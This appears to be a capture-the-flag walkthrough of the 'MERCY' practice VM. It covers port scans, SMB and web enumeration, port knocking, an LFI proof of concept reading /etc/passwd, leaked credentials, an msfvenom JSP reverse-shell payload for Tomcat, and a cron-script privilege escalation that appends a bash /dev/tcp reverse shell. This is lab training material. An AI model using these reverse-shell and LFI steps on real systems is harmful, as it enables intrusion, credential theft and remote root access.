Nmap
sudo nmap -p53,110,139,143,445,993,995,8080 -sC -sV 10.0.2.56
sudo: unable to resolve host nucleus: Name or service not known
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-01 05:38 EDT
Nmap scan report for 10.0.2.56 (10.0.2.56)
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: STLS TOP UIDL CAPA AUTH-RESP-CODE SASL RESP-CODES PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: OK more LOGIN-REFERRALS have listed STARTTLS LOGINDISABLEDA0001 post-login SASL-IR capabilities IMAP4rev1 ENABLE IDLE ID LITERAL+ Pre-login
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 08:00:27:09:EA:BA (Oracle VirtualBox virtual NIC)
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2h39m41s, deviation: 4h37m07s, median: 17s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: mercy
| NetBIOS computer name: MERCY\x00
| Domain name: \x00
| FQDN: mercy
|_ System time: 2021-05-01T17:39:21+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-01T09:39:21
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.90 seconds
initial port Scan
Enumeration
WebServer Enumeration
gobuster dir -u http://10.0.2.56:8080/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -s 200,301,302 -x txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.0.2.56:8080/
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,301,302
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html
[+] Timeout: 10s
===============================================================
2021/05/01 05:52:01 Starting gobuster
===============================================================
/index.html (Status: 200)
/docs (Status: 302)
/examples (Status: 302)
/robots.txt (Status: 200)
/manager (Status: 302)
===============================================================
2021/05/01 05:55:27 Finished
===============================================================
afterdecoding got to know that someone using their password as password
SMB Enumeration
smbmap -H 10.0.2.56 --depth 5 1 ⨯
[+] Guest session IP: 10.0.2.56:445 Name: 10.0.2.56
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
qiu NO ACCESS
IPC$ NO ACCESS IPC Service (MERCY server (Samba, Ubuntu))
FoundUser as qiu
logginf the smbserver with the password we found earlier
there is config file at \.private\opensesame\
directory
inthat config file it menctioned about the port knocking
PortKnocking
here the port 22 and 80 are filtered if they are knocked then we can open the port access
Port Knocking Daemon Configuration
[options]
UseSyslog
[openHTTP]
sequence = 159,27391,4
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn
[closeHTTP]
sequence = 4,27391,159
seq_timeout = 100
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn
[openSSH]
sequence = 17301,28504,9999
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9999,28504,17301
seq_timeout = 100
command = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
if we scan the port
now port 80 is open
robots.txt
got to knw that /mercy /nomercy are two directories
on /nomercy
it’s running RIPS 0.53
with is vulnerable to LFI
Exploitation
LFI
102: file $lines = file($file);
96: $file = $_GET['file'];
PoC:
http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd
File: /windows/function.php
===========================
64: file $lines = file($file);
58: $file = $_GET['file'];
PoC:
http://localhost/rips/windows/function.php?file=../../../../../../etc/passwd(will
thisisasuperduperlonguser:heartbreakisinevitable
fluffy:freakishfluffybunny
ApacheTomcat
now with this creds we can login into tomcat manager and deploy shell for reverseConnection
shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war
now shell deployed
PrivilageEsclation
after su as fluffy
User there is writeable file which is owned by root running as a cron job
fluffy@MERCY:~$ ls -al
ls -al
total 20
drwxr-x--- 4 fluffy fluffy 4096 May 1 20:53 .
drwxr-xr-x 6 root root 4096 Nov 20 2018 ..
-rw------- 1 fluffy fluffy 12 Nov 20 2018 .bash_history
drwx------ 2 fluffy fluffy 4096 May 1 20:53 .gnupg
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20 2018 .private
fluffy@MERCY:~$ cd .private
cd .private
fluffy@MERCY:~/.private$ ls
ls
secrets
fluffy@MERCY:~/.private$ cd secret
cd secret
bash: cd: secret: No such file or directory
fluffy@MERCY:~/.private$ cd secrets
cd secrets
fluffy@MERCY:~/.private/secrets$ ls -al
ls -al
total 20
drwxr-xr-x 2 fluffy fluffy 4096 Nov 20 2018 .
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20 2018 ..
-rwxr-xr-x 1 fluffy fluffy 37 Nov 20 2018 backup.save
-rw-r--r-- 1 fluffy fluffy 12 Nov 20 2018 .secrets
-rwxrwxrwx 1 root root 222 Nov 20 2018 timeclock
fluffy@MERCY:~/.private/secrets$ cd timeclock
cd timeclock
bash: cd: timeclock: Not a directory
fluffy@MERCY:~/.private/secrets$ timecloack
timecloack
timecloack: command not found
fluffy@MERCY:~/.private/secrets$ timeclock
timeclock
timeclock: command not found
fluffy@MERCY:~/.private/secrets$ ./timeclock
./timeclock
./timeclock: line 4: ../../../../../var/www/html/time: Permission denied
./timeclock: line 5: ../../../../../var/www/html/time: Permission denied
chown: changing ownership of ‘../../../../../var/www/html/time’: Operation not permitted
fluffy@MERCY:~/.private/secrets$ echo "bash -i >& /dev/tcp/10.0.2.15/4242 0>&1" >> timeclock
>> timeclocki >& /dev/tcp/10.0.2.15/4242 0>&1"
timeclock is a writeable file and which has a executable permission for everyone
echo the bash reverse shell command and wait to execute